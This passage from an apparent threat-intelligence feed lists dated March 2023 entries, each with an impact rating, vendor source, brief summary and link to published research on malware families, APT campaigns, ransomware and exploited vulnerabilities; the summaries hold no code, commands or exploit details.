ASEC has observed the ChinaZ DDoS Bot malware being installed on Linux SSH servers. The ChinaZ group, which was discovered in 2014, installs various DDoS bots on Windows and Linux systems. Major DDoS bots suspected to have been created by the ChinaZ threat group include XorDDoS, AESDDos, BillGates, and MrBlack.
Source: https://asec.ahnlab.com/en/50316/
2023-03-30
ShellBot_Malware_distribution
MEDIUM
Intel Source:
ASEC
Intel Name:
ShellBot_Malware_distribution
Date of Scan:
2023-03-30
Impact:
MEDIUM
Summary:
ASEC researchers have recently observed the ShellBot malware being installed on Linux SSH servers. ShellBot, aka PerlBot, is a DDoS Bot malware developed in Perl that characteristically uses the IRC protocol to communicate with the C&C server. ShellBot is an old malware that has been in steady use and is still being used today to launch attacks against Linux systems.
Source: https://asec.ahnlab.com/en/49769/comment-page-2/#comments
2023-03-29
New_Threats_Delivering_Through_NullMixer_Malware
LOW
Intel Source:
Medium
Intel Name:
New_Threats_Delivering_Through_NullMixer_Malware
Date of Scan:
2023-03-29
Impact:
LOW
Summary:
Researchers from Medium have identified that the NullMixer malware operation revealed that Italy and France are the favorite European countries from the opportunistic attackers’ perspective. They obtained information and data regarding an ongoing malware operation hitting more than 8,000 targets within a few weeks, with a particular emphasis on North American, Italian, and French targets.
Source: https://medium.com/@lcam/updates-from-the-maas-new-threats-delivered-through-nullmixer-d45defc260d1
2023-03-29
Tofsee_Botnet_Engaging_With_Proxying_and_Mining
LOW
Intel Source:
BitSight
Intel Name:
Tofsee_Botnet_Engaging_With_Proxying_and_Mining
Date of Scan:
2023-03-29
Impact:
LOW
Summary:
Researchers from BitSight have observed a 15-year-old modular spambot called Tofsee being distributed by PrivateLoader (ruzki), a notorious malware distribution service.
Source: https://www.bitsight.com/blog/tofsee-botnet-proxying-and-mining
2023-03-29
Kimsuky_Group_Leveraging_Alternate_Data_Stream_to_Hide_Malware
LOW
Intel Source:
ASEC
Intel Name:
Kimsuky_Group_Leveraging_Alternate_Data_Stream_to_Hide_Malware
Date of Scan:
2023-03-29
Impact:
LOW
Summary:
Researchers from ASEC have discovered that the Kimsuky group is using Alternate Data Stream (ADS) to hide their malware. This malware is an Infostealer that collects data by starting the VBScript included inside an HTML file. It can be characterized by its tendency to add the actual code between numerous dummy codes.
Source: https://asec.ahnlab.com/en/50625/
2023-03-29
New_Linux_Malware_Linked_With_Chinese_APT_Groups
MEDIUM
Intel Source:
Exatrack
Intel Name:
New_Linux_Malware_Linked_With_Chinese_APT_Groups
Date of Scan:
2023-03-29
Impact:
MEDIUM
Summary:
Exatrack researchers have linked a previously unknown Chinese state-sponsored hacking group to a novel piece of malware aimed at Linux servers, dubbed Mélofée.
Source: https://blog.exatrack.com/melofee/
2023-03-29
A_Deep_Dive_into_APT43
MEDIUM
Intel Source:
Mandiant
Intel Name:
A_Deep_Dive_into_APT43
Date of Scan:
2023-03-29
Impact:
MEDIUM
Summary:
Mandiant researchers have assessed with high confidence that APT43 is a moderately-sophisticated cyber operator that supports the interests of the North Korean regime. Campaigns attributed to APT43 include strategic intelligence collection aligned with Pyongyang’s geopolitical interests, credential harvesting, and social engineering to support espionage activities, and financially-motivated cybercrime to fund operations.
Source: https://mandiant.widen.net/s/zvmfw5fnjs/apt43-report
2023-03-29
Hackers_From_Biter_Group_Targeting_Chinese_Nuclear_Energy_Industry
LOW
Intel Source:
Intezer
Intel Name:
Hackers_From_Biter_Group_Targeting_Chinese_Nuclear_Energy_Industry
Date of Scan:
2023-03-29
Impact:
LOW
Summary:
Researchers from Intezer have observed that a cyberespionage hacking group tracked as 'Bitter APT' has recently been targeting the Chinese nuclear energy industry, using phishing emails to infect devices with malware downloaders.
Source: https://www.intezer.com/blog/research/phishing-campaign-targets-nuclear-energy-industry/
2023-03-28
The_Investigation_of_CVE_2023_23397
HIGH
Intel Source:
Microsoft
Intel Name:
The_Investigation_of_CVE_2023_23397
Date of Scan:
2023-03-28
Impact:
HIGH
Summary:
Microsoft researchers have provided guidance on the steps organizations can take to assess whether users have been targeted or compromised by threat actors exploiting CVE-2023-23397. A successful exploit of this vulnerability can result in unauthorized access to an organization’s environment by triggering a Net-NTLMv2 hash leak.
Source: https://www.microsoft.com/en-us/security/blog/2023/03/24/guidance-for-investigating-attacks-using-cve-2023-23397/
2023-03-28
A_new_Malware_as_a_Service_platform_Cinoshi
LOW
Intel Source:
Cyble
Intel Name:
A_new_Malware_as_a_Service_platform_Cinoshi
Date of Scan:
2023-03-28
Impact:
LOW
Summary:
Cyble researchers discovered a new Malware-as-a-Service (MaaS) platform, “Cinoshi”. Cinoshi’s arsenal consists of a stealer, botnet, clipper, and cryptominer. The MaaS platform is now offering the stealer and its web panel for free, which is rarely seen. The accessibility of these free malware services indicates that attackers no longer need technical expertise or resources to launch cyber-attacks.
Source: https://blog.cyble.com/2023/03/23/cinoshi-project-and-the-dark-side-of-free-maas/
2023-03-28
Earth_Preta_Cyberespionage_Campaign_Hits_Over_200
LOW
Intel Source:
TrendMicro
Intel Name:
Earth_Preta_Cyberespionage_Campaign_Hits_Over_200
Date of Scan:
2023-03-28
Impact:
LOW
Summary:
TrendMicro researchers have analyzed the active campaign, delving into the structure, goals, and requirements of the organizations involved, which provided an opportunity to conduct wider intelligence analysis and gain insights for the development of effective countermeasures.
Source: https://www.trendmicro.com/en_us/research/23/c/earth-preta-cyberespionage-campaign-hits-over-200.html
2023-03-28
The_Hunter_obfuscator_used_by_Magecart_skimmer
LOW
Intel Source:
Malwarebytes
Intel Name:
The_Hunter_obfuscator_used_by_Magecart_skimmer
Date of Scan:
2023-03-28
Impact:
LOW
Summary:
Malwarebytes researchers discovered and analyzed a Magecart skimmer that uses Hunter, a PHP JavaScript obfuscator. During their investigation, they observed a number of domains, all part of the same infrastructure, with custom skimmers for several Magento stores.
Source: https://www.malwarebytes.com/blog/threat-intelligence/2023/03/hunter-skimmer
2023-03-28
BlackGuard_stealer_new_variant
LOW
Intel Source:
AT&T
Intel Name:
BlackGuard_stealer_new_variant
Date of Scan:
2023-03-28
Impact:
LOW
Summary:
AT&T Alien Labs researchers have observed a new variant of the BlackGuard stealer in the wild, infecting victims via spear-phishing attacks. BlackGuard steals sensitive user information from a wide range of applications and browsers, can hijack crypto wallet addresses copied to the clipboard, and also tries to propagate through removable media and shared devices.
Source: https://cybersecurity.att.com/blogs/labs-research/blackguard-stealer-extends-its-capabilities-in-new-variant
2023-03-28
DBatLoader_Targeting_European_Businesses_via_Phishing_Email
LOW
Intel Source:
ZScaler
Intel Name:
DBatLoader_Targeting_European_Businesses_via_Phishing_Email
Date of Scan:
2023-03-28
Impact:
LOW
Summary:
Researchers from Zscaler have identified a new campaign involving DBatLoader also known as ModiLoader that specifically targets manufacturing companies and various businesses in European countries via phishing emails.
Source: https://www.zscaler.com/blogs/security-research/dbatloader-actively-distributing-malwares-targeting-european-businesses
2023-03-27
New_Era_of_IcedID
MEDIUM
Intel Source:
Proofpoint
Intel Name:
New_Era_of_IcedID
Date of Scan:
2023-03-27
Impact:
MEDIUM
Summary:
Proofpoint researchers have observed three new distinct variants of the malware known as IcedID. Proofpoint calls these variants “Forked” IcedID, “Lite” IcedID, and the Standard IcedID variant. IcedID was originally classified as a banking malware and was first observed in 2017. It also performs as a loader for other malware, including ransomware. There are several key differences between the original and the new variants; one is the removal of banking functionality such as web injects and backconnect. Proofpoint researchers suspect the original operators behind Emotet are using an IcedID variant with different functionality.
Source: https://www.proofpoint.com/us/blog/threat-insight/fork-ice-new-era-icedid?utm_source=social_organic&utm_social_network=twitter&utm_campaign=threat_research&utm_post_id=f0afcf84-fcda-487f-9e48-d05eabdbf03d
2023-03-27
A_new_ransomware_named_Dark_Power
MEDIUM
Intel Source:
Trellix
Intel Name:
A_new_ransomware_named_Dark_Power
Date of Scan:
2023-03-27
Impact:
MEDIUM
Summary:
Researchers from Trellix have identified a new ransomware operation named 'Dark Power' that has appeared, and it has already listed its first victims on a dark web data leak site, threatening to publish the data if a ransom is not paid.
Source: https://www.trellix.com/en-us/about/newsroom/stories/research/shining-light-on-dark-power.html
2023-03-27
New_macOS_based_Stealer_MacStealer_Malware
LOW
Intel Source:
Uptycs
Intel Name:
New_macOS_based_Stealer_MacStealer_Malware
Date of Scan:
2023-03-27
Impact:
LOW
Summary:
The Uptycs threat research team has observed another macOS stealer, "MacStealer". The threat actor distributing MacStealer was discovered by the Uptycs threat intelligence team during their dark web hunting. The stealer can extract documents, cookies from a victim's browser, and login information. It affects Catalina and subsequent macOS versions running on Intel, M1, and M2 CPUs.
Source: https://www.uptycs.com/blog/macstealer-command-and-control-c2-malware
2023-03-27
MacOS_Malware_Targeting_Data_Assets
LOW
Intel Source:
Sentinelone
Intel Name:
MacOS_Malware_Targeting_Data_Assets
Date of Scan:
2023-03-27
Impact:
LOW
Summary:
SentinelOne researchers have examined the data assets targeted by macOS malware in some of the most recent in-the-wild incidents, in order to help defenders better protect the enterprise and hunt for signs of compromise.
Source: https://www.sentinelone.com/blog/session-cookies-keychains-ssh-keys-and-more-7-kinds-of-data-malware-steals-from-macos-users/
2023-03-25
Earth_Preta_Changing_its_TTPs_to_Bypass_Security_Solutions
LOW
Intel Source:
TrendMicro
Intel Name:
Earth_Preta_Changing_its_TTPs_to_Bypass_Security_Solutions
Date of Scan:
2023-03-25
Impact:
LOW
Summary:
TrendMicro researchers have discovered Earth Preta delivering lure archives via spear-phishing emails and Google Drive links. After months of investigation, they identified that several undisclosed malware and interesting tools used for exfiltration purposes were used in this campaign.
Source: https://www.trendmicro.com/en_us/research/23/c/earth-preta-updated-stealthy-strategies.html
2023-03-25
Exploring_New_Public_Cloud_File_Borne_Phishing_Attack
LOW
Intel Source:
Inquest
Intel Name:
Exploring_New_Public_Cloud_File_Borne_Phishing_Attack
Date of Scan:
2023-03-25
Impact:
LOW
Summary:
Researchers from InQuest Labs have analyzed a credential phishing attack discovered by a municipal government organization. The email arrived from a compromised sender account address. The sender organization in the observed samples is the municipality's county health agency.
Source: https://inquest.net/blog/2023/03/22/credential-caution-exploring-new-public-cloud-file-borne-phishing-attack
2023-03-25
Microsoft_Office_Outlook_Privilege_Escalation_Vulnerability
HIGH
Intel Source:
ASEC
Intel Name:
Microsoft_Office_Outlook_Privilege_Escalation_Vulnerability
Date of Scan:
2023-03-25
Impact:
HIGH
Summary:
Researchers from ASEC have analyzed the Microsoft vulnerability in Outlook for Windows that is being exploited to steal NTLM credentials.
Source: https://asec.ahnlab.com/en/50218/
2023-03-25
MDS_Evasion_Feature_of_Anti_Sandboxes_That_Use_Pop_up_Windows
LOW
Intel Source:
ASEC
Intel Name:
MDS_Evasion_Feature_of_Anti_Sandboxes_That_Use_Pop_up_Windows
Date of Scan:
2023-03-25
Impact:
LOW
Summary:
ASEC researchers have monitored various anti-sandbox tactics. One persistent anti-sandbox technique exploits the button form in malicious IcedID Word files; the post also covers the evasion-detection feature of AhnLab’s MDS, which is meant for detecting such malicious behavior.
Source: https://asec.ahnlab.com/en/50198/
2023-03-25
Chinese_Hackers_Targeting_Middle_East_Telecom_Providers
LOW
Intel Source:
Sentinelone
Intel Name:
Chinese_Hackers_Targeting_Middle_East_Telecom_Providers
Date of Scan:
2023-03-25
Impact:
LOW
Summary:
SentinelLabs researchers have observed the use of a well-maintained, versioned credential theft capability and a new dropper mechanism indicative of an ongoing development effort by a highly-motivated threat actor with specific tasking requirements.
Source: https://www.sentinelone.com/labs/operation-tainted-love-chinese-apts-target-telcos-in-new-attacks/
2023-03-24
Diving_Deep_into_UNC961
LOW
Intel Source:
Mandiant
Intel Name:
Diving_Deep_into_UNC961
Date of Scan:
2023-03-24
Impact:
LOW
Summary:
Researchers from Mandiant have analyzed the details and timeline of each intrusion conducted by UNC961, along with detection opportunities and examples of how Managed Defense’s proactive threat hunting, investigation, and response routinely limits the impact on our customers’ business and prevents their reality from being desecrated.
Source: https://www.mandiant.com/resources/blog/unc961-multiverse-financially-motivated
2023-03-24
AresLoader_Linked_With_Russian_APT_Group
LOW
Intel Source:
Intel471
Intel Name:
AresLoader_Linked_With_Russian_APT_Group
Date of Scan:
2023-03-24
Impact:
LOW
Summary:
Intel471 researchers have observed a new loader malware-as-a-service (MaaS) named AresLoader, offered by threat actors with links to Russian hacktivism, that was recently spotted in the wild.
Source: https://intel471.com/blog/new-loader-on-the-bloc-aresloader
2023-03-24
New_Kritec_Magecart_Skimmer_Targeting_Magento_Stores
LOW
Intel Source:
Malwarebytes
Intel Name:
New_Kritec_Magecart_Skimmer_Targeting_Magento_Stores
Date of Scan:
2023-03-24
Impact:
LOW
Summary:
Malwarebytes researchers have identified instances of compromised stores having both skimmers loaded, which means double trouble for victims as their credit card information is stolen not just once but twice.
Source: https://www.malwarebytes.com/blog/threat-intelligence/2023/03/new-kritec-skimmer
2023-03-23
A_Detailed_Examination_of_LockBit_From_CISA_and_MS_ISAC
MEDIUM
Intel Source:
CISA
Intel Name:
A_Detailed_Examination_of_LockBit_From_CISA_and_MS_ISAC
Date of Scan:
2023-03-23
Impact:
MEDIUM
Summary:
Researchers from CISA and MS-ISAC have issued a joint advisory warning against the LockBit ransomware. Recommended mitigations include developing a comprehensive restoration plan, employing robust passwords for all accounts, integrating anti-phishing measures, updating software and system versions, and segregating network components, among others.
Source: https://www.cisa.gov/sites/default/files/2023-03/aa23-075a-stop-ransomware-lockbit.pdf
2023-03-23
The_Analysis_of_Hidden_Threats
LOW
Intel Source:
Unit42
Intel Name:
The_Analysis_of_Hidden_Threats
Date of Scan:
2023-03-23
Impact:
LOW
Summary:
Researchers from PaloAlto have discussed two important ways they have been able to tailor the analysis environment. Threats are continually evolving, and architecting analysis systems as more of a flexible, nicely abstracted software development kit instead of a stand-alone monolithic application is crucial.
Source: https://unit42.paloaltonetworks.com/tailoring-sandbox-techniques/
2023-03-23
The_New_Ransomware_Named_ALC_Ransomware
LOW
Intel Source:
Cyfirma
Intel Name:
The_New_Ransomware_Named_ALC_Ransomware
Date of Scan:
2023-03-23
Impact:
LOW
Summary:
CYFIRMA researchers have identified a new strain of malware, named ALC Ransomware, which masquerades as ransomware but is scareware. This malware does not encrypt files on the victim’s machine, but instead disables the task manager, locks the screen, and displays a ransom note.
Source: https://www.cyfirma.com/outofband/alc-scareware-pretends-to-be-a-ransomware/
2023-03-23
SideCopy_APT_group_targets_India_goverment_organization
LOW
Intel Source:
Cyble
Intel Name:
SideCopy_APT_group_targets_India_goverment_organization
Date of Scan:
2023-03-23
Impact:
LOW
Summary:
Recently, Cyble researchers discovered a Twitter post of an ongoing campaign by SideCopy APT against the “Defence Research and Development Organisation” of the Indian government. DRDO is a government agency tasked with researching and developing advanced technologies for use by the Indian Armed Forces.
Source: https://blog.cyble.com/2023/03/21/notorious-sidecopy-apt-group-sets-sights-on-indias-drdo/
2023-03-23
An_Emerging_Ransomware_Strain_Named_Trigona_Ransomware
LOW
Intel Source:
Unit 42
Intel Name:
An_Emerging_Ransomware_Strain_Named_Trigona_Ransomware
Date of Scan:
2023-03-23
Impact:
LOW
Summary:
PaloAlto researchers have identified two new Trigona ransom notes in January 2023 and two in February 2023. Trigona’s ransom notes are unique; rather than the usual text file, they are instead presented in an HTML Application with embedded JavaScript containing unique computer IDs (CID) and victim IDs (VID).
Source: https://unit42.paloaltonetworks.com/trigona-ransomware-update/
2023-03-23
Emotet_Malware_Spreading_via_OneNote_Attachments_to_Deliver_Payloads
LOW
Intel Source:
Cyble
Intel Name:
Emotet_Malware_Spreading_via_OneNote_Attachments_to_Deliver_Payloads
Date of Scan:
2023-03-23
Impact:
LOW
Summary:
Cyble researchers have closely monitored the Emotet campaign and identified that it is once again spreading malicious emails and infecting devices globally by rebuilding its network.
Source: https://blog.cyble.com/2023/03/17/recent-emotet-spam-campaign-utilizing-new-tactics/
2023-03-22
The_Examination_of_the_Attack_Vectors_of_APT37
LOW
Intel Source:
ZScaler
Intel Name:
The_Examination_of_the_Attack_Vectors_of_APT37
Date of Scan:
2023-03-22
Impact:
LOW
Summary:
Researchers from Zscaler have analyzed the APT37 and found it is a threat actor heavily focused on targeting entities in South Korea. It is constantly updating its tactics, techniques, and procedures as is evident from the multiple file types used in the initial stages by it. The themes used by this threat actor range from geopolitics, current events, and education to finance and insurance.
Source: https://www.zscaler.com/blogs/security-research/unintentional-leak-glimpse-attack-vectors-apt37
2023-03-22
Observed_Exploitation_of_Adobe_ColdFusion
LOW
Intel Source:
Rapid7
Intel Name:
Observed_Exploitation_of_Adobe_ColdFusion
Date of Scan:
2023-03-22
Impact:
LOW
Summary:
Rapid7’s threat intelligence team has observed active exploitation of Adobe ColdFusion in multiple customer environments.
Source: https://www.rapid7.com/blog/post/2023/03/21/etr-rapid7-observed-exploitation-of-adobe-coldfusion/
2023-03-22
New_ShellBot_DDoS_Malware_Targeting_Poorly_Managed_Linux_Servers
LOW
Intel Source:
ASEC
Intel Name:
New_ShellBot_DDoS_Malware_Targeting_Poorly_Managed_Linux_Servers
Date of Scan:
2023-03-22
Impact:
LOW
Summary:
ASEC researchers have observed that poorly managed Linux SSH servers are being targeted as part of a new campaign that deploys different variants of malware called ShellBot. ShellBot, also known as PerlBot, is a DDoS Bot malware developed in Perl and characteristically uses IRC protocol to communicate with the C&C server.
Source: https://asec.ahnlab.com/en/49769/
2023-03-22
Microsoft_OneNote_Attachments_used_by_QakBot_eCrime_Campaign
LOW
Intel Source:
CrowdStrike
Intel Name:
Microsoft_OneNote_Attachments_used_by_QakBot_eCrime_Campaign
Date of Scan:
2023-03-22
Impact:
LOW
Summary:
https://www.crowdstrike.com/blog/qakbot-ecrime-campaign-leverages-microsoft-onenote-for-distribution/
Source: https://www.crowdstrike.com/blog/qakbot-ecrime-campaign-leverages-microsoft-onenote-for-distribution/
2023-03-21
The_Analysis_of_FudModule_within_the_Lazarus
LOW
Intel Source:
IBM Security Intelligence
Intel Name:
The_Analysis_of_FudModule_within_the_Lazarus
Date of Scan:
2023-03-21
Impact:
LOW
Summary:
Researchers from IBM Security Intelligence have analyzed the FudModule within the Lazarus sample, as well as highlighted a strategy of using telemetry stream health as a mode of detecting malware designed to impair defenses through ETW tampering.
Source: https://securityintelligence.com/posts/defensive-considerations-lazarus-fudmodule/
2023-03-21
A_New_APT_Discovered_in_the_Area_of_Russo_Ukrainian_Conflict
LOW
Intel Source:
Securelist
Intel Name:
A_New_APT_Discovered_in_the_Area_of_Russo_Ukrainian_Conflict
Date of Scan:
2023-03-21
Impact:
LOW
Summary:
Securelist researchers have identified a new APT group but have not yet found any direct links between the samples and data used in this campaign and any previously known actors. However, the campaign is still active, and the investigation continues.
Source: https://securelist.com/bad-magic-apt/109087/
2023-03-21
Hackers_targeting_DotNET_Developers_With_Malicious_NuGet_Packages
LOW
Intel Source:
JFrog
Intel Name:
Hackers_targeting_DotNET_Developers_With_Malicious_NuGet_Packages
Date of Scan:
2023-03-21
Impact:
LOW
Summary:
Researchers from JFrog have identified that threat actors are targeting and infecting .NET developers with cryptocurrency stealers delivered through the NuGet repository and impersonating multiple legitimate packages via typosquatting.
Source: https://jfrog.com/blog/attackers-are-starting-to-target-net-developers-with-malicious-code-nuget-packages/
2023-03-20
In_depth_Analysis_of_DotRunpeX_Injector
LOW
Intel Source:
Checkpoint
Intel Name:
In_depth_Analysis_of_DotRunpeX_Injector
Date of Scan:
2023-03-20
Impact:
LOW
Summary:
Researchers from Checkpoint have analyzed the dotRunpeX injector and its relation to the older version; the investigation shows that dotRunpeX is used in the wild to deliver numerous known malware families.
Source: https://research.checkpoint.com/2023/dotrunpex-demystifying-new-virtualized-net-injector-used-in-the-wild/
2023-03-20
BIanLian_Ransomware_Gang_Turns_to_Data_Extortion
LOW
Intel Source:
Redacted
Intel Name:
BIanLian_Ransomware_Gang_Turns_to_Data_Extortion
Date of Scan:
2023-03-20
Impact:
LOW
Summary:
Redacted researchers have identified that the BianLian ransomware group has shifted its focus from encrypting its victims' files to only exfiltrating data found on compromised networks and using it for extortion.
Source: https://redacted.com/blog/bianlian-ransomware-gang-continues-to-evolve/
2023-03-20
Hackers_From_China_and_Russia_using_SILKLOADER_Malware_to_Avoid_Detection
LOW
Intel Source:
WithSecure
Intel Name:
Hackers_From_China_and_Russia_using_SILKLOADER_Malware_to_Avoid_Detection
Date of Scan:
2023-03-20
Impact:
LOW
Summary:
Researchers from WithSecure Labs have investigated an interesting Cobalt Strike beacon loader that leverages DLL side-loading, which they are tracking as SILKLOADER. A closer look at the loader identified several activity clusters leveraging it within both the Russian and Chinese cybercriminal ecosystems.
Source: https://labs.withsecure.com/content/dam/labs/docs/withsecure-silkloader.pdf
2023-03-20
Diving_Deep_into_Go_Based_Threat
LOW
Intel Source:
Akamai
Intel Name:
Diving_Deep_into_Go_Based_Threat
Date of Scan:
2023-03-20
Impact:
LOW
Summary:
Researchers from Akamai have discovered a new botnet named HinataBot at the start of the year; they caught it on their HTTP and SSH honeypots and observed it exploiting old flaws such as CVE-2014-8361 and CVE-2017-17215.
Source: https://www.akamai.com/blog/security-research/hinatabot-uncovering-new-golang-ddos-botnet
2023-03-20
Chinese_Hackers_Suspected_of_Launching_Fortinet_Zero_day_Attacks
MEDIUM
Intel Source:
Mandiant
Intel Name:
Chinese_Hackers_Suspected_of_Launching_Fortinet_Zero_day_Attacks
Date of Scan:
2023-03-20
Impact:
MEDIUM
Summary:
Mandiant researchers have discovered that a suspected Chinese hacking group has been linked to a series of attacks on government organizations exploiting a Fortinet zero-day vulnerability (CVE-2022-41328) to deploy malware.
Source: https://www.mandiant.com/resources/blog/fortinet-malware-ecosystem
2023-03-20
A_New_InfoStealer_Named_HookSpoofer
LOW
Intel Source:
Uptycs
Intel Name:
A_New_InfoStealer_Named_HookSpoofer
Date of Scan:
2023-03-20
Impact:
LOW
Summary:
Uptycs researchers have discovered a new infostealer with keylogging and clipper capabilities named HookSpoofer, spread by multiple bundlers. A bundler is a collection of two or more files combined together in a single package.
Source: https://www.uptycs.com/blog/threat-research-hookspoofer
2023-03-18
The_Popularity_of_ProxyNotShell_Continues_to_Grow
LOW
Intel Source:
Sophos
Intel Name:
The_Popularity_of_ProxyNotShell_Continues_to_Grow
Date of Scan:
2023-03-18
Impact:
LOW
Summary:
Researchers from Sophos have observed that the ProxyNotShell vulnerability continues to make waves, as the November 2022 fixes fail to contain the SSRF tactic.
Source: https://news.sophos.com/en-us/2023/03/15/observing-owassrf-exchange-exploitation-still/
2023-03-18
ChatGPT_Rising_Activities_in_Cybercrime_World
MEDIUM
Intel Source:
G Data Blog
Intel Name:
ChatGPT_Rising_Activities_in_Cybercrime_World
Date of Scan:
2023-03-18
Impact:
MEDIUM
Summary:
Researchers from G DATA have observed that cyberthreat actors capitalize on prominent social events and the latest technology buzzwords to launch their attacks. The curtain raiser for 2023 that made the headlines was the clamor around, and viral use of, a very human-sounding artificial intelligence chatbot named ChatGPT.
Source: https://www.gdatasoftware.com/blog/2023/03/37716-chatgpt-evil-twin
2023-03-18
The_Investigation_of_Winter_Vivern_APT_Activity
LOW
Intel Source:
Sentinelone
Intel Name:
The_Investigation_of_Winter_Vivern_APT_Activity
Date of Scan:
2023-03-18
Impact:
LOW
Summary:
SentinelOne researchers have analyzed Winter Vivern Advanced Persistent Threat (APT) activity, leveraging observations made by the Polish CBZC and Ukraine CERT, and uncovered a previously unknown set of espionage campaigns and targeting activities conducted by this threat actor.
Source: https://www.sentinelone.com/labs/winter-vivern-uncovering-a-wave-of-global-espionage/
2023-03-18
APT_C_36_Linked_With_Campaigns
LOW
Intel Source:
Lab52
Intel Name:
APT_C_36_Linked_With_Campaigns
Date of Scan:
2023-03-18
Impact:
LOW
Summary:
Researchers from Lab52 have observed that the APT-C-36 group has many similarities in terms of tactics, techniques, and procedures (TTPs) with the group Hagga / Aggah.
Source: https://lab52.io/blog/apt-c-36-from-njrat-to-apt-c-36/
2023-03-17
Hackers_From_YoroTrooper_Group_Targeting_CIS_Energy_Orgs_and_EU_Embassies
MEDIUM
Intel Source:
Talos
Intel Name:
Hackers_From_YoroTrooper_Group_Targeting_CIS_Energy_Orgs_and_EU_Embassies
Date of Scan:
2023-03-17
Impact:
MEDIUM
Summary:
Cisco Talos researchers have identified that a new threat actor named 'YoroTrooper' has been running cyber-espionage campaigns since at least June 2022, targeting government and energy organizations in Commonwealth of Independent States (CIS) countries.
Source: https://blog.talosintelligence.com/yorotrooper-espionage-campaign-cis-turkey-europe/
2023-03-16
The_MedusaLocker_Ransomware_is_Revealed
LOW
Intel Source:
Cyble
Intel Name:
The_MedusaLocker_Ransomware_is_Revealed
Date of Scan:
2023-03-16
Impact:
LOW
Summary:
Researchers from Cyble have unmasked the MedusaLocker ransomware. It's known to target Hospital and Healthcare industries, but additionally, the gang also targets industries such as Education and Government organizations.
Source: https://blog.cyble.com/2023/03/15/unmasking-medusalocker-ransomware/
2023-03-16
Russian_Threat_Group_NOBELIUM_Targeting_Western_Countries
MEDIUM
Intel Source:
Blackberry
Intel Name:
Russian_Threat_Group_NOBELIUM_Targeting_Western_Countries
Date of Scan:
2023-03-16
Impact:
MEDIUM
Summary:
Researchers from Blackberry have observed a new campaign targeting European Union countries, specifically, its diplomatic entities and systems transmitting sensitive information about the region's politics, aiding Ukrainian citizens fleeing the country, and providing help to the government of Ukraine.
Source: https://blogs.blackberry.com/en/2023/03/nobelium-targets-eu-governments-assisting-ukraine
2023-03-16
Hackers_Exploiting_SVB_Collapse_Scenario
LOW
Intel Source:
Cyble
Intel Name:
Hackers_Exploiting_SVB_Collapse_Scenario
Date of Scan:
2023-03-16
Impact:
LOW
Summary:
Cyble researchers have identified several suspicious websites that have emerged in the wake of the Silicon Valley Bank (SVB) collapse.
Source: https://blog.cyble.com/2023/03/14/svb-collapse-triggers-heightened-cybersecurity-concerns/
2023-03-16
A_Look_at_Dark_Side_of_Email_Traffic
LOW
Intel Source:
Juniper
Intel Name:
A_Look_at_Dark_Side_of_Email_Traffic
Date of Scan:
2023-03-16
Impact:
LOW
Summary:
Researchers from Juniper have analyzed the dark side of email traffic, uncovering some of the latest malware threats, tactics, and trends that can potentially undermine the systems.
Source: https://blogs.juniper.net/en-us/threat-research/uncovering-the-dark-side-of-email-traffic
2023-03-16
The_Examination_of_FG_IR_22_369
HIGH
Intel Source:
Fortinet
Intel Name:
The_Examination_of_FG_IR_22_369
Date of Scan:
2023-03-16
Impact:
HIGH
Summary:
Fortinet researchers have identified that government entities and large organizations are being targeted by an unknown threat actor exploiting a security flaw in Fortinet FortiOS software, resulting in data loss and OS and file corruption.
Source: https://www.fortinet.com/blog/psirt-blogs/fg-ir-22-369-psirt-analysis
2023-03-16
APT_Group_Tick_Targeting_Data_Loss_Prevention_Company
MEDIUM
Intel Source:
Welivesecurity
Intel Name:
APT_Group_Tick_Targeting_Data_Loss_Prevention_Company
Date of Scan:
2023-03-16
Impact:
MEDIUM
Summary:
ESET researchers have discovered a campaign by the APT group Tick. The attackers compromised the DLP company’s internal update servers to deliver malware inside the software developer’s network and trojanized installers of legitimate tools used by the company, which eventually resulted in the execution of malware on the computers of the company’s customers.
Source: https://www.welivesecurity.com/2023/03/14/slow-ticking-time-bomb-tick-apt-group-dlp-software-developer-east-asia/
2023-03-16
Telerik_Vulnerability_in_US_Government_IIS_Server
MEDIUM
Intel Source:
CISA
Intel Name:
Telerik_Vulnerability_in_US_Government_IIS_Server
Date of Scan:
2023-03-16
Impact:
MEDIUM
Summary:
CISA, the FBI, and MS-ISAC released a joint Cybersecurity Advisory. This joint CSA provides IT infrastructure defenders with TTPs, IOCs, and detection and protection methods against similar, successful CVE-2019-18935 exploitation.
Source: https://www.cisa.gov/news-events/cybersecurity-advisories?search_api_fulltext=&sort_by=field_release_date&page=1
2023-03-16
Large_Scale_Phishing_Campaigns_are_Powered_by_DEV_1101_AiTM_Phishing_Kit
MEDIUM
Intel Source:
Microsoft
Intel Name:
Large_Scale_Phishing_Campaigns_are_Powered_by_DEV_1101_AiTM_Phishing_Kit
Date of Scan:
2023-03-16
Impact:
MEDIUM
Summary:
Researchers from Microsoft have identified an open-source adversary-in-the-middle (AiTM) phishing kit that has found a number of takers in the cybercrime world for its ability to orchestrate attacks at scale. Microsoft is tracking the threat actor behind the development of the kit under its emerging moniker DEV-1101.
Source: https://www.microsoft.com/en-us/security/blog/2023/03/13/dev-1101-enables-high-volume-aitm-campaigns-with-open-source-phishing-kit/
2023-03-16
Mallox_Ransomware_Distributing_in_Korea
LOW
Intel Source:
ASEC
Intel Name:
Mallox_Ransomware_Distributing_in_Korea
Date of Scan:
2023-03-16
Impact:
LOW
Summary:
ASEC researchers have discovered the distribution of the Mallox ransomware which targets vulnerable MS-SQL servers.
Source: https://asec.ahnlab.com/en/49366/
2023-03-16
Microsoft_SmartScreen_Bypassed_by_Magniber_Ransomware_Actors
LOW
Intel Source:
Google Blog
Intel Name:
Microsoft_SmartScreen_Bypassed_by_Magniber_Ransomware_Actors
Date of Scan:
2023-03-16
Impact:
LOW
Summary:
Researchers from Google’s Threat Analysis Group have discovered the usage of an unpatched security bypass in Microsoft’s SmartScreen security feature, which financially motivated actors are using to deliver the Magniber ransomware without any security warnings. The attackers are delivering MSI files signed with an invalid but specially crafted Authenticode signature.
Source: https://blog.google/threat-analysis-group/magniber-ransomware-actors-used-a-variant-of-microsoft-smartscreen-bypass/
2023-03-16
Diving_Deep_into_CatB_Ransomware
LOW
Intel Source:
Sentinelone
Intel Name:
Diving_Deep_into_CatB_Ransomware
Date of Scan:
2023-03-16
Impact:
LOW
Summary:
SentinelOne researchers have analyzed the CatB ransomware and its abuse of the legitimate MSDTC service, describing its evasion tactics, encryption behavior, and its attempts to steal credentials and browser data.
Source: https://www.sentinelone.com/blog/decrypting-catb-ransomware-analyzing-their-latest-attack-methods/
2023-03-15
North_Korea_s_UNC2970_TTPs_Part_1_and_2
MEDIUM
Intel Source:
Mandiant
